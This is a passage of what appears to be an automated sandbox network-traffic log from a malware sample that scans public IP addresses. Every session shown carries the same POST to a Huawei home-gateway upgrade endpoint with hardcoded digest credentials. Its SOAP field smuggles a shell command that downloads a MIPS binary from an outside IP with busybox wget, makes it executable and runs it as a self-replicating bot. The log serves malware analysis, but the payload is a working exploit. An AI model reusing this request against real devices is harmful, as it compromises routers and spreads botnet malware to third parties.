                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.234868241.102.30.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278223038 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.2342102157.12.58.19737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278228045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.234474091.49.104.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278244972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.235710241.99.127.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278390884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.2333438157.44.17.11737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278395891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.2341292197.99.15.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278398037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.235515444.125.89.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278414965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.2349230197.220.97.14837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278415918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.2342126157.219.10.14037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278414965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.2345418197.191.112.19737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278451920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
